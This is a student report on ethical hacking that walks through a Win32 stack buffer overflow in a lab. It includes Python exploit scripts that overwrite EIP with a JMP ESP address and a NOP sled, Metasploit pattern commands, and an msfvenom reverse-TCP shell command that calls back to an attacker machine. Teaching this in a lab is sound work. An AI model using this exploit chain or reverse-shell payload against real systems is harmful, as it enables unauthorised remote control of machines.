ICT Ethical Hacking: Exploit Development, Vulnerability Analysis

Added on  2023/06/04
Running head: ICT ETHICAL HACKING
ICT Ethical Hacking
Name of the Student
Name of the University
Author Note
Exploit development is the process of finding bugs and vulnerabilities in a computer system and taking advantage of them to gain control over it. It is what makes privilege escalation and denial-of-service attacks possible (Thomas, Burmeister & Low, 2017). Development proceeds in several phases, each of which must be completed before the next one can begin.
Initiation phase: the Linux platform is used for the entire development process. The Kali Virtual Machine is started first, followed by the Win32 buffer-overflow victim Virtual Machine (Wang & Yang, 2017). Both machines are placed on a NAT network and their IP addresses are checked.
Overflow:
#!/usr/bin/python
import sys
import os
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# Testing: send 500 "A" bytes (0x41) and observe whether the service crashes
buffer = b"\x41" * 500
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
The server.exe is started in Immunity Debugger on the Windows host, and the F9 key starts its execution. A Python file named ‘attack.py’ containing the code above is then created and run with the command “python attack.py IP_ADDRESS 1337”, where IP_ADDRESS is the address of the Windows Virtual Machine (Sinha, 2017). Once the script has run, switch back to the Windows environment and press Shift and F9 together to pass the exception to the executable.
From the above figure, we can see that EIP and EBP contain the required value, and that the ESP value generated in the process points to the memory containing the injected bytes.
Weaponizing the vulnerability:
In this phase, press CTRL and F2 together to restart server.exe within Immunity Debugger, then press F9 to start execution again (Li et al., 2018). Within Kali, change to the Metasploit tools directory with cd /usr/share/metasploit-framework/tools/exploit and run ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337; this is where the IP addresses of the Windows Virtual Machine and the physical machine are matched. Then press SHIFT + F9 within Immunity Debugger to pass the exception. Run ./pattern_offset.rb -l 5000 -q 37694136 within Kali to determine the offset of EIP. Next, the code that will jump to ESP needs to be determined. The attack.py is modified as follows:
#!/usr/bin/python
import sys
import os
import socket

host = sys.argv[1]
port = int(sys.argv[2])

# EIP is overwritten at 260 bytes
buffer = b"\x41" * 260
# Overwrite EIP with the address of a JMP ESP instruction (little-endian byte order)
buffer += b"\x78\x16\xF3\x77"
# NOP sled, so that a slightly inaccurate jump still lands in the shellcode
buffer += b"\x90" * 128
# Shellcode: the msfvenom output from the next step is pasted here (the report does not reproduce it)
shellcode = b""  # placeholder
buffer += shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buffer)
s.close()
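How pattern_offset.rb arrives at 260 from the EIP value 37694136, as an added Python example that is not part of the original report and not Metasploit's own code: it rebuilds the cyclic pattern that pattern_create.rb sends and searches it for the EIP bytes interpreted as a little-endian value, so the reader can verify the offset without running the tool.

```python
import re
import string


def pattern_create(length):
    """Build the Metasploit-style cyclic pattern.

    Every 3-byte triplet is Upper+lower+digit and each triplet is unique,
    so any 4-byte window occurs only once within the first
    26*26*10*3 = 20280 bytes. Truncated to LENGTH bytes.
    """
    triplets = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triplets.append(upper + lower + digit)
    return "".join(triplets)[:length].encode()


def pattern_offset(length, query):
    """Locate QUERY in a pattern of LENGTH bytes; -1 if not present.

    QUERY is either the 4 ASCII bytes seen in the debugger or an
    8-hex-digit register value. A hex value is unpacked little-endian,
    the way an x86 EIP value maps onto memory, mirroring pattern_offset.rb.
    """
    pattern = pattern_create(length)
    if re.fullmatch(r"(0x)?[0-9a-fA-F]{8}", query):
        needle = int(query, 16).to_bytes(4, "little")
    else:
        needle = query.encode()
    return pattern.find(needle)


if __name__ == "__main__":
    # The values from the report: EIP = 0x37694136 after sending 5000 pattern bytes
    print(pattern_offset(5000, "37694136"))  # 260, the padding length used in attack.py
```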
Shellcode
1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python, where <KALI_IP> is the IP address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.
References
Li, L., Li, Z., Shahriar, H., Rutherfoord, R., Peltsverger, S., & Tatum, D. (2018). Ethical Hacking: Network Security and Penetration Testing.
Sinha, S. (2017). Python 3 and Ethical Hacking. In Beginning Ethical Hacking with Python (pp. 37-38). Apress, Berkeley, CA.
Thomas, G., Burmeister, O. K., & Low, G. (2017). Issues of Implied Trust in Ethical Hacking. In Proceedings of The 28th Australasian Conference on Information Systems, December (pp. 4-6).
Wang, Y., & Yang, J. (2017, March). Ethical Hacking and Network Defense: Choose Your Best Network Vulnerability Scanning Tool. In Advanced Information Networking and Applications Workshops (WAINA), 2017 31st International Conference on (pp. 110-113). IEEE.